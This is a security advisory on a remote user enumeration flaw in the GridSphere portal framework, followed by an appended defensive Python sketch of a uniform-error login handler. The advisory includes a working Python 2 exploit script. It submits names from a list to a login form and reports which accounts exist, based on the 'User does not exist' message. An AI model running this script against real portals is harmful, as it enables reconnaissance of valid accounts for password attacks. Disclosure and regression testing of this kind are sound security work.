########################################################################
# GRIDSPHERE REMOTE USER ENUMERATION
########################################################################

Author : IPSECS
Website: http://ipsecs.com

[i] Description

GridSphere is a web-based portal framework for accessing grid computing
resources. It provides an open-source, portlet-based web portal. GridSphere
enables developers to quickly develop and package third-party portlet web
applications that can be run and administered within the GridSphere portlet
container.

Vendor URL
http://gridsphere.org

Vulnerable Version
GridSphere 2.2.8
GridSphere 2.2.10
Others may be vulnerable

[ii] Problem Description

GridSphere, which is critically used to access grid resources, was found to
be vulnerable in a way that can be exploited to enumerate whether a user is
valid in the grid. The vulnerability exists because GridSphere answers a
login attempt for a nonexistent user with "User does not exist".

[iii] Exploit and PoC

You can download at http://ipsecs.com/web/?p=178

#!/usr/bin/python
# Gridsphere - gridportlet remote user enumeration exploit
# Copyright IPSECS (c) 2010 http://ipsecs.com
# Thanks to underground people who gives idea about python and javascript
# You know who you are :-)
# Written for Python 2 (urllib2, print statement).

import sys, re
from urllib2 import urlopen
# You need to install ClientForm from this site
# http://wwwsearch.sourceforge.net/old/ClientForm
from ClientForm import ParseResponse

def main():
    if len(sys.argv) != 3:
        print "Usage : python " + sys.argv[0] + " [URL Login] [User List File]"
        print "Example : python " + sys.argv[0] + " https://example.com/acgt/portal?cid=mptoolportlet1 users.txt"
        sys.exit(0)

    # Fetch the login page and parse its HTML forms
    response = urlopen(sys.argv[1])
    forms = ParseResponse(response, backwards_compat=False)

    # You have to modify the index in some cases!
    # Try to print what is inside forms[0] forms[1] forms[2] etc
    form = forms[2]

    userlist = open(sys.argv[2], "r")
    for user in userlist:
        # Submit the login form with the candidate user name and a fixed password
        form["username"] = user.rstrip()
        form["password"] = "password"
        result = urlopen(form.click()).read()

        # The distinct error message reveals whether the account exists
        igot = re.search("User does not exist", result)
        if igot:
            print "[INVALID] " + user.rstrip()
        else:
            print "[OK] " + user.rstrip()

if __name__ == '__main__':
    main()

[iv] Fix

Currently there's no patch for this vulnerability.
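
Added example (not part of the original advisory and not GridSphere code): a Python 3 sketch of the login behaviour described in [ii] next to a handler that returns one message for every failed login, with a regression check that flags the difference. The account store, the function names and the "Incorrect password" message are assumptions made for illustration.

```python
import hashlib
import hmac
import os

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

# Constructed sample account store (username -> (salt, hash)); not GridSphere data.
_SALT = os.urandom(16)
USERS = {"alice": (_SALT, _hash("correct horse", _SALT))}
# Dummy record so an unknown username still costs one hash computation.
_DUMMY = (os.urandom(16), os.urandom(32))

GENERIC_FAILURE = "Invalid username or password"

def login_leaky(username, password):
    """Behaviour from the advisory: unknown users get a distinct message."""
    record = USERS.get(username)
    if record is None:
        return "User does not exist"
    salt, stored = record
    if hmac.compare_digest(_hash(password, salt), stored):
        return "OK"
    return "Incorrect password"  # assumed wording for the other failure case

def login_uniform(username, password):
    """One message for every failure, and the same hashing work either way."""
    salt, stored = USERS.get(username, _DUMMY)
    matches = hmac.compare_digest(_hash(password, salt), stored)
    if matches and username in USERS:
        return "OK"
    return GENERIC_FAILURE

def leaks_user_existence(login, known_user, unknown_user, wrong_password="x"):
    """Regression check: True if a failed login differs for known vs unknown users."""
    return login(known_user, wrong_password) != login(unknown_user, wrong_password)

if __name__ == "__main__":
    print("leaky handler leaks:  ", leaks_user_existence(login_leaky, "alice", "nobody"))
    print("uniform handler leaks:", leaks_user_existence(login_uniform, "alice", "nobody"))
```

The same comparison applies to any other endpoint that accepts a user name, such as password reset or registration.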